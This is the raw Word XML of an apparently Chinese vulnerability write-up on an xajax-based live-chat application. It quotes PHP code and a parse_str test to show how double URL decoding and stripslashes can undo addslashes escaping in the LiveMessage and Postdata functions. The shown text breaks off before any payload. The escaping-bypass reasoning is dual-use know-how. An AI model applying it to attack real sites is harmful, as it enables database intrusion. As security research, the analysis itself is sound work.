                    <w:ind w:left="1800" w:right="3037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5"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$this-&gt;iPos++; </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>continue;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="4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sQuery .=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$this-&gt;aObjArray[$this-&gt;iPos];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$this-&gt;iPos++;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parse_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str(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$sQuery, $aArray);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="71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($this-&gt;bDecodeUTF8Input) {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foreach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($aArray as $key =&gt; $value) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:ind w:left="180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aArray[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$key] = $this-&gt;_decodeUTF8Data($value);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(get_magic_quotes_gpc() == 1) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="71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$newArray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array(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/>
        </w:rPr>
        <w:t>File:xajax.class.php</w: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417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shape id="_x0000_s9927" type="#_x0000_t202" style="width:319.25pt;height:179.3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 w:line="309" w:lineRule="auto"/>
                    <w:ind w:left="1800" w:right="1351" w:hanging="36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foreach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($aArray as $sKey =&gt; $sValue) { if (is_string($sValue))</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="2"/>
                    <w:ind w:left="21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newArray[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$sKey] = stripslashes($sValue);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:ind w:left="180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</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="71"/>
                    <w:ind w:left="21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newArray[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$sKey] = $sValue;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144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$aArray = $newArray;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return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$aArray;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="71"/>
                    <w:ind w:left="3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5"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="37"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>问题发生在哪里了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w: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a3"/>
        <w:spacing w:before="169"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>parse_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>str(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>$sQuery, $aArray);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="43"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个函数，本身会对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-54"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码进行一次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-54"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">decode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s9926" type="#_x0000_t202" style="position:absolute;margin-left:80.7pt;margin-top:19.55pt;width:337.5pt;height:116.05pt;z-index:318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4621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$_GET['b']; echo "&lt;br&gt;";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3898"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>parse_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>str(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$_GET['b']); echo $a;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80020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3975268" cy="1164336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68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rPr>
          <w:rFonts w:ascii="MS Mincho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99"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>第二</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>处逻辑</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="29"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s9925" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:16.35pt;width:337.5pt;height:116.05pt;z-index:320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(get_magic_quotes_gpc() == 1) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="1779" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$newArray = 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180" w:right="251" w:hanging="401"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>foreach</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> ($aArray as $sKey =&gt; $sValue) { if (is_string($sValue))</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:line="388" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="1980" w:firstLine="240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newArray[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$sKey] = stripslashes($sValue);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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-56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gpc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>开启的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>话</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，它会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>行一次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-56"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>stripslashes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="55"/>
        <w:ind w:left="417" w:right="317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以往的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注册函数有两个前台可以利用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="112"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">Postdata </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>LiveMessage</w:t>
      </w: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11"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-60"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>LiveMessage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:group id="_x0000_s9858" style="position:absolute;margin-left:80.6pt;margin-top:12.8pt;width:337.75pt;height:246.7pt;z-index:3256;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="1612,256" coordsize="6755,4934">
            <v:rect id="_x0000_s9924" style="position:absolute;left:1617;top:261;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9923" style="position:absolute;left:1797;top:504;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9922" style="position:absolute;left:2761;top:504;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9921" style="position:absolute;left:2881;top:504;width:1808;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9920" style="position:absolute;left:4689;top:504;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9919" style="position:absolute;left:4809;top:504;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9918" style="position:absolute;left:1617;top:767;width:6745;height:326" fillcolor="#f8f8f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9917" type="#_x0000_t75" style="position:absolute;left:1797;top:830;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s9916" style="position:absolute;left:2197;top:830;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9915" style="position:absolute;left:2920;top:830;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9914" style="position:absolute;left:3040;top:830;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9913" style="position:absolute;left:1617;top:1093;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s9912" type="#_x0000_t75" style="position:absolute;left:1797;top:1156;width:400;height:200">
              <v:imagedata r:id="rId37" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s9911" style="position:absolute;left:2197;top:1156;width:1205;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9910" style="position:absolute;left:3402;top:1156;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9909" style="position:absolute;left:3522;top:1156;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9908" style="position:absolute;left:3643;top:1156;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9907" style="position:absolute;left:3763;top:1156;width:2772;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9906" style="position:absolute;left:1617;top:1419;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s9905" type="#_x0000_t75" style="position:absolute;left:1797;top:1482;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s9904" style="position:absolute;left:2197;top:1482;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9903" style="position:absolute;left:2799;top:1482;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9902" style="position:absolute;left:2920;top:1482;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9901" style="position:absolute;left:3040;top:1482;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9900" style="position:absolute;left:3161;top:1482;width:4940;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9899" style="position:absolute;left:1617;top:1745;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s9898" type="#_x0000_t75" style="position:absolute;left:1797;top:1808;width:400;height:200">
              <v:imagedata r:id="rId37" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s9897" style="position:absolute;left:2197;top:1808;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9896" style="position:absolute;left:2920;top:1808;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9895" style="position:absolute;left:3040;top:1808;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9894" style="position:absolute;left:3161;top:1808;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9893" style="position:absolute;left:1617;top:2071;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9892" style="position:absolute;left:1797;top:2134;width:5061;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9891" style="position:absolute;left:1617;top:2397;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s9890" type="#_x0000_t75" style="position:absolute;left:1797;top:2460;width:400;height:200">
              <v:imagedata r:id="rId37" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s9889" style="position:absolute;left:2197;top:2460;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9888" style="position:absolute;left:3161;top:2460;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9887" style="position:absolute;left:3281;top:2460;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9886" style="position:absolute;left:3402;top:2460;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9885" style="position:absolute;left:1617;top:2723;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9884" style="position:absolute;left:1797;top:2786;width:5302;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9883" style="position:absolute;left:1617;top:3049;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s9882" type="#_x0000_t75" style="position:absolute;left:1797;top:3112;width:400;height:200">
              <v:imagedata r:id="rId37" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s9881" style="position:absolute;left:2197;top:3112;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9880" style="position:absolute;left:2920;top:3112;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9879" style="position:absolute;left:3040;top:3112;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9878" style="position:absolute;left:3161;top:3112;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9877" style="position:absolute;left:1617;top:3375;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9876" style="position:absolute;left:1797;top:3438;width:5061;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9875" style="position:absolute;left:1617;top:3701;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s9874" type="#_x0000_t75" style="position:absolute;left:1797;top:3764;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s9873" style="position:absolute;left:2197;top:3764;width:1566;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9872" style="position:absolute;left:3763;top:3764;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9871" style="position:absolute;left:3884;top:3764;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9870" style="position:absolute;left:4004;top:3764;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9869" style="position:absolute;left:1617;top:4027;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9868" style="position:absolute;left:1797;top:4090;width:5904;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9867" style="position:absolute;left:1617;top:4353;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s9866" type="#_x0000_t75" style="position:absolute;left:1797;top:4416;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s9865" style="position:absolute;left:2197;top:4416;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9864" style="position:absolute;left:3161;top:4416;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9863" style="position:absolute;left:3281;top:4416;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9862" style="position:absolute;left:3402;top:4416;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9861" style="position:absolute;left:1617;top:4679;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9860" style="position:absolute;left:1797;top:4742;width:5302;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s9859" type="#_x0000_t202" style="position:absolute;left:1614;top:259;width:6750;height:4929" filled="f" strokecolor="#ccc" strokeweight=".24pt">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="6"/>
                      <w:rPr>
                        <w:rFonts w:ascii="宋体"/>
                        <w:sz w:val="18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579" w:right="3416" w:hanging="39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LiveMessage($a) { global $db;</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr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$sessionid = $_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SESSION[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'sessionid'];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$name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htmlspecialchars($a['name']));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1537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$email =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htmlspecialchars($a['email']));</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="391" w:lineRule="auto"/>
                      <w:ind w:left="180" w:right="50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$country =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htmlspecialchars($a['country']));</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="391" w:lineRule="auto"/>
                      <w:ind w:left="180" w:right="1537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$phone =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htmlspecialchars($a['phone']));</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="391" w:lineRule="auto"/>
                      <w:ind w:left="180" w:right="50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$departmentid =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htmlspecialchars($a['departmentid']));</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="391" w:lineRule="auto"/>
                      <w:ind w:left="180" w:right="50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$message =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htmlspecialchars($a['message']));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pStyle w:val="a3"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所有的参数都被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-59"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>addslashes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="51"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pP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在看看：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="102"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>Postdata</w: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3"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="321" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="4408"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
